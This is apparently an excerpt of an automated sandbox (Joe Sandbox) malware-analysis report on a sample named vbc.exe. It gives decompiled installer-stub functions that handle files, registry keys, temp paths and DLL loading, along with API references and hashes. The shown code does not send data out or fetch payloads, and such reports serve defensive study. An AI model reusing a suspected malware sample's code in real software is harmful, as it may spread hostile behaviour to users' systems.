                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004026b9
                                                0x004026b9
                                                0x004026bc
                                                0x004026bd
                                                0x004026c0
                                                0x004026c5
                                                0x004026cc
                                                0x004026d4
                                                0x00000000
                                                0x004026da
                                                0x004026da
                                                0x004026df
                                                0x00000000
                                                0x004026e5
                                                0x004026e5
                                                0x004026ed
                                                0x004026f0
                                                0x004026f3
                                                0x004027ae
                                                0x004027b5
                                                0x004026f9
                                                0x004026ff
                                                0x0040270b
                                                0x00402775
                                                0x00402775
                                                0x0040270d
                                                0x0040270d
                                                0x00402710
                                                0x00402712
                                                0x00402712
                                                0x00402712
                                                0x00402715
                                                0x0040271a
                                                0x0040271d
                                                0x00000000
                                                0x00000000
                                                0x0040271f
                                                0x00402722
                                                0x0040272a
                                                0x00402736
                                                0x00402744
                                                0x00000000
                                                0x00402746
                                                0x00000000
                                                0x00402746
                                                0x00000000
                                                0x00402744
                                                0x00402712
                                                0x00402778
                                                0x0040277b
                                                0x00000000
                                                0x0040277d
                                                0x00402782
                                                0x004027c3
                                                0x004027e5
                                                0x004027ec
                                                0x004027d1
                                                0x004027d1
                                                0x004027d4
                                                0x004027d7
                                                0x004027da
                                                0x004027da
                                                0x00000000
                                                0x0040278b
                                                0x0040278b
                                                0x0040278e
                                                0x00402791
                                                0x00402797
                                                0x0040279b
                                                0x0040279e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040279e
                                                0x00402782
                                                0x0040277b
                                                0x004026f3
                                                0x004026df
                                                0x004026d4
                                                0x00000000
                                                0x004027a0
                                                0x004027a0
                                                0x004027a3
                                                0x004027ac
                                                0x00000000
                                                0x004026a3
                                                0x0040268e
                                                0x00402ae4
                                                0x00402aea

                                                APIs
                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026CC
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402707
                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402740
                                                  • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EDE
                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                • String ID: 9
                                                • API String ID: 163830602-2366072709
                                                • Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
                                                • Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 73%
                                                			E00401DB3(intOrPtr __edx) {
                                                				void* __esi;
                                                				int _t9;
                                                				signed char _t15;
                                                				struct HFONT__* _t18;
                                                				intOrPtr _t30;
                                                				struct HDC__* _t31;
                                                				void* _t33;
                                                				void* _t35;
                                                
                                                				_t30 = __edx;
                                                				_t31 = GetDC( *(_t35 - 8));
                                                				_t9 = E00402C31(2);
                                                				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
                                                				0x40cde0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
                                                				ReleaseDC( *(_t35 - 8), _t31);
                                                				 *0x40cdf0 = E00402C31(3);
                                                				_t15 =  *((intOrPtr*)(_t35 - 0x18));
                                                				 *((intOrPtr*)(_t35 - 0x50)) = _t30;
                                                				 *0x40cdf7 = 1;
                                                				 *0x40cdf4 = _t15 & 0x00000001;
                                                				 *0x40cdf5 = _t15 & 0x00000002;
                                                				 *0x40cdf6 = _t15 & 0x00000004;
                                                				E00406234(_t9, _t31, _t33, "Tahoma",  *((intOrPtr*)(_t35 - 0x24)));
                                                				_t18 = CreateFontIndirectW(0x40cde0); // executed
                                                				_push(_t18);
                                                				_push(_t33);
                                                				E00406159();
                                                				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t35 - 4));
                                                				return 0;
                                                			}











                                                0x00401db3
                                                0x00401dbe
                                                0x00401dc0
                                                0x00401dcd
                                                0x00401de4
                                                0x00401de9
                                                0x00401df6
                                                0x00401dfb
                                                0x00401dff
                                                0x00401e0a
                                                0x00401e11
                                                0x00401e23
                                                0x00401e29
                                                0x00401e2e
                                                0x00401e38
                                                0x004025a8
                                                0x0040156d
                                                0x00402a81
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • GetDC.USER32(?), ref: 00401DB6
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                • MulDiv.KERNEL32 ref: 00401DD8
                                                • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID: Tahoma
                                                • API String ID: 3808545654-3580928618
                                                • Opcode ID: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
                                                • Instruction ID: 65d3cf27749cc92dd64e462d7a068a1de8cb11dbe253a65c0e26eefc01b1c80e
                                                • Opcode Fuzzy Hash: e9dc967046a9833b494e13a4fbbc470b8de16a0e7eb7b9edd9fcccda2063d4ab
                                                • Instruction Fuzzy Hash: B8015271544245EFE7006BB4AF4AA9E7FB5BF55301F14097DE142BA1E2CBB80006AB2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 949 405840-40588b CreateDirectoryW 950 405891-40589e GetLastError 949->950 951 40588d-40588f 949->951 952 4058b8-4058ba 950->952 953 4058a0-4058b4 SetFileSecurityW 950->953 951->952 953->951 954 4058b6 GetLastError 953->954 954->952
                                                C-Code - Quality: 100%
                                                			E00405840(WCHAR* _a4) {
                                                				struct _SECURITY_ATTRIBUTES _v16;
                                                				struct _SECURITY_DESCRIPTOR _v36;
                                                				int _t22;
                                                				long _t23;
                                                
                                                				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                				_v36.Owner = 0x4083f8;
                                                				_v36.Group = 0x4083f8;
                                                				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                				_v16.lpSecurityDescriptor =  &_v36;
                                                				_v36.Revision = 1;
                                                				_v36.Control = 4;
                                                				_v36.Dacl = 0x4083e8;
                                                				_v16.nLength = 0xc;
                                                				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                                				if(_t22 != 0) {
                                                					L1:
                                                					return 0;
                                                				}
                                                				_t23 = GetLastError();
                                                				if(_t23 == 0xb7) {
                                                					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                                						goto L1;
                                                					}
                                                					return GetLastError();
                                                				}
                                                				return _t23;
                                                			}







                                                0x0040584b
                                                0x0040584f
                                                0x00405852
                                                0x00405858
                                                0x0040585c
                                                0x00405860
                                                0x00405868
                                                0x0040586f
                                                0x00405875
                                                0x0040587c
                                                0x00405883
                                                0x0040588b
                                                0x0040588d
                                                0x00000000
                                                0x0040588d
                                                0x00405897
                                                0x0040589e
                                                0x004058b4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004058b6
                                                0x004058ba

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                • GetLastError.KERNEL32 ref: 00405897
                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
                                                • GetLastError.KERNEL32 ref: 004058B6
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
                                                • C:\Users\Public, xrefs: 00405840
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\Public
                                                • API String ID: 3449924974-2845914341
                                                • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
                                                • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 955 40657c-40659c GetSystemDirectoryW 956 4065a0-4065a2 955->956 957 40659e 955->957 958 4065b3-4065b5 956->958 959 4065a4-4065ad 956->959 957->956 961 4065b6-4065e9 wsprintfW LoadLibraryExW 958->961 959->958 960 4065af-4065b1 959->960 960->961
                                                C-Code - Quality: 100%
                                                			E0040657C(intOrPtr _a4) {
                                                				short _v576;
                                                				signed int _t13;
                                                				struct HINSTANCE__* _t17;
                                                				signed int _t19;
                                                				void* _t24;
                                                
                                                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                				if(_t13 > 0x104) {
                                                					_t13 = 0;
                                                				}
                                                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                					_t19 = 1;
                                                				} else {
                                                					_t19 = 0;
                                                				}
                                                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                				return _t17;
                                                			}








                                                0x00406593
                                                0x0040659c
                                                0x0040659e
                                                0x0040659e
                                                0x004065a2
                                                0x004065b5
                                                0x004065af
                                                0x004065af
                                                0x004065af
                                                0x004065ce
                                                0x004065e2
                                                0x004065e9

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                • wsprintfW.USER32 ref: 004065CE
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                • String ID: %s%S.dll$UXTHEME$\
                                                • API String ID: 2200240437-1946221925
                                                • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
                                                • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 962 4023ea-402430 call 402d48 call 402c53 * 2 RegCreateKeyExW 969 402436-40243e 962->969 970 402adb-402aea 962->970 972 402440-40244d call 402c53 lstrlenW 969->972 973 402451-402454 969->973 972->973 976 402456-402467 call 402c31 973->976 977 402468-40246b 973->977 976->977 978 40247c-402490 RegSetValueExW 977->978 979 40246d-402477 call 40317b 977->979 984 402492 978->984 985 402495-402573 RegCloseKey 978->985 979->978 984->985 985->970 987 4028a1-4028a8 985->987 987->970
                                                C-Code - Quality: 86%
                                                			E004023EA(void* __eax, intOrPtr __edx) {
                                                				void* _t18;
                                                				short* _t21;
                                                				int _t22;
                                                				long _t25;
                                                				char _t27;
                                                				int _t30;
                                                				intOrPtr _t35;
                                                				intOrPtr _t39;
                                                				void* _t41;
                                                
                                                				_t35 = __edx;
                                                				_t18 = E00402D48(__eax);
                                                				_t39 =  *((intOrPtr*)(_t41 - 0x18));
                                                				 *(_t41 - 0x50) =  *(_t41 - 0x14);
                                                				 *(_t41 - 0x38) = E00402C53(2);
                                                				_t21 = E00402C53(0x11);
                                                				_t34 =  *0x42a2f0 | 0x00000002;
                                                				 *(_t41 - 4) = 1;
                                                				_t22 = RegCreateKeyExW(_t18, _t21, _t30, _t30, _t30,  *0x42a2f0 | 0x00000002, _t30, _t41 + 8, _t30); // executed
                                                				if(_t22 == 0) {
                                                					if(_t39 == 1) {
                                                						E00402C53(0x23);
                                                						_t22 = lstrlenW(0x40b5d8) + _t29 + 2;
                                                					}
                                                					if(_t39 == 4) {
                                                						_t27 = E00402C31(3);
                                                						_pop(_t34);
                                                						 *0x40b5d8 = _t27;
                                                						 *((intOrPtr*)(_t41 - 0x30)) = _t35;
                                                						_t22 = _t39;
                                                					}
                                                					if(_t39 == 3) {
                                                						_t22 = E0040317B(_t34,  *((intOrPtr*)(_t41 - 0x1c)), _t30, 0x40b5d8, 0x1800); // executed
                                                					}
                                                					_t25 = RegSetValueExW( *(_t41 + 8),  *(_t41 - 0x38), _t30,  *(_t41 - 0x50), 0x40b5d8, _t22); // executed
                                                					if(_t25 == 0) {
                                                						 *(_t41 - 4) = _t30;
                                                					}
                                                					_push( *(_t41 + 8));
                                                					RegCloseKey(); // executed
                                                				}
                                                				 *0x42a2c8 =  *0x42a2c8 +  *(_t41 - 4);
                                                				return 0;
                                                			}












                                                0x004023ea
                                                0x004023eb
                                                0x004023f0
                                                0x004023fa
                                                0x00402404
                                                0x00402407
                                                0x00402417
                                                0x00402421
                                                0x00402428
                                                0x00402430
                                                0x0040243e
                                                0x00402442
                                                0x0040244d
                                                0x0040244d
                                                0x00402454
                                                0x00402458
                                                0x0040245d
                                                0x0040245e
                                                0x00402464
                                                0x00402467
                                                0x00402467
                                                0x0040246b
                                                0x00402477
                                                0x00402477
                                                0x00402488
                                                0x00402490
                                                0x00402492
                                                0x00402492
                                                0x00402495
                                                0x0040256d
                                                0x0040256d
                                                0x00402ade
                                                0x00402aea

                                                APIs
                                                • RegCreateKeyExW.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00402428
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp5B93.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402448
                                                • RegSetValueExW.KERNEL32 ref: 00402488
                                                • RegCloseKey.KERNEL32(?), ref: 0040256D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CloseCreateValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp
                                                • API String ID: 1356686001-1098459130
                                                • Opcode ID: 71f114d009b9ee50bbf06c02ea87a5392997286f50ed36a836319f608d05baec
                                                • Instruction ID: 4be5953a60dfee5a88bc6a75bc26a7970e9a4d525f64453ad6d2d9daaf41070d
                                                • Opcode Fuzzy Hash: 71f114d009b9ee50bbf06c02ea87a5392997286f50ed36a836319f608d05baec
                                                • Instruction Fuzzy Hash: 85216F71E00118BFEB10AFA4DE89DAE7B78EB04358F11843AF505B71D1DBB88D419B68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 988 405e16-405e22 989 405e23-405e57 GetTickCount GetTempFileNameW 988->989 990 405e66-405e68 989->990 991 405e59-405e5b 989->991 993 405e60-405e63 990->993 991->989 992 405e5d 991->992 992->993
                                                C-Code - Quality: 100%
                                                			E00405E16(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				intOrPtr _v8;
                                                				short _v12;
                                                				short _t12;
                                                				intOrPtr _t13;
                                                				signed int _t14;
                                                				WCHAR* _t17;
                                                				signed int _t19;
                                                				signed short _t23;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = _a4;
                                                				_t23 = 0x64;
                                                				while(1) {
                                                					_t12 =  *L"nsa"; // 0x73006e
                                                					_t23 = _t23 - 1;
                                                					_v12 = _t12;
                                                					_t13 =  *0x40a584; // 0x61
                                                					_v8 = _t13;
                                                					_t14 = GetTickCount();
                                                					_t19 = 0x1a;
                                                					_v8 = _v8 + _t14 % _t19;
                                                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                					if(_t17 != 0) {
                                                						break;
                                                					}
                                                					if(_t23 != 0) {
                                                						continue;
                                                					} else {
                                                						 *_t26 =  *_t26 & _t23;
                                                					}
                                                					L4:
                                                					return _t17;
                                                				}
                                                				_t17 = _t26;
                                                				goto L4;
                                                			}












                                                0x00405e1c
                                                0x00405e22
                                                0x00405e23
                                                0x00405e23
                                                0x00405e28
                                                0x00405e29
                                                0x00405e2c
                                                0x00405e31
                                                0x00405e34
                                                0x00405e3e
                                                0x00405e4b
                                                0x00405e4f
                                                0x00405e57
                                                0x00000000
                                                0x00000000
                                                0x00405e5b
                                                0x00000000
                                                0x00405e5d
                                                0x00405e5d
                                                0x00405e5d
                                                0x00405e60
                                                0x00405e63
                                                0x00405e63
                                                0x00405e66
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,"C:\Users\Public\vbc.exe" ,00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E34
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\Public\vbc.exe" ,00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1498418707
                                                • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
                                                • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 994 402c93-402cbc RegOpenKeyExW 995 402d27-402d2b 994->995 996 402cbe-402cc9 994->996 997 402ce4-402cf4 RegEnumKeyW 996->997 998 402cf6-402d08 RegCloseKey call 4065ec 997->998 999 402ccb-402cce 997->999 1007 402d0a-402d19 998->1007 1008 402d2e-402d34 998->1008 1000 402cd0-402ce2 call 402c93 999->1000 1001 402d1b-402d1e RegCloseKey 999->1001 1000->997 1000->998 1005 402d24-402d26 1001->1005 1005->995 1007->995 1008->1005 1009 402d36-402d44 RegDeleteKeyW 1008->1009 1009->1005 1010 402d46 1009->1010 1010->995
                                                C-Code - Quality: 84%
                                                			E00402C93(void* _a4, short* _a8, intOrPtr _a12) {
                                                				void* _v8;
                                                				short _v532;
                                                				long _t18;
                                                				intOrPtr* _t27;
                                                				long _t28;
                                                
                                                				_t18 = RegOpenKeyExW(_a4, _a8, 0,  *0x42a2f0 | 0x00000008,  &_v8); // executed
                                                				if(_t18 == 0) {
                                                					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
                                                						if(_a12 != 0) {
                                                							RegCloseKey(_v8);
                                                							L8:
                                                							return 1;
                                                						}
                                                						if(E00402C93(_v8,  &_v532, 0) != 0) {
                                                							break;
                                                						}
                                                					}
                                                					RegCloseKey(_v8);
                                                					_t27 = E004065EC(3);
                                                					if(_t27 == 0) {
                                                						if( *0x42a2f0 != 0) {
                                                							goto L8;
                                                						}
                                                						_t28 = RegDeleteKeyW(_a4, _a8);
                                                						if(_t28 != 0) {
                                                							goto L8;
                                                						}
                                                						return _t28;
                                                					}
                                                					return  *_t27(_a4, _a8,  *0x42a2f0, 0);
                                                				}
                                                				return _t18;
                                                			}








                                                0x00402cb4
                                                0x00402cbc
                                                0x00402ce4
                                                0x00402cce
                                                0x00402d1e
                                                0x00402d24
                                                0x00000000
                                                0x00402d26
                                                0x00402ce2
                                                0x00000000
                                                0x00000000
                                                0x00402ce2
                                                0x00402cf9
                                                0x00402d01
                                                0x00402d08
                                                0x00402d34
                                                0x00000000
                                                0x00000000
                                                0x00402d3c
                                                0x00402d44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402d44
                                                0x00000000
                                                0x00402d17
                                                0x00402d2b

                                                APIs
                                                • RegOpenKeyExW.KERNEL32 ref: 00402CB4
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
                                                • RegCloseKey.ADVAPI32(?), ref: 00402CF9
                                                • RegCloseKey.ADVAPI32(?), ref: 00402D1E
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
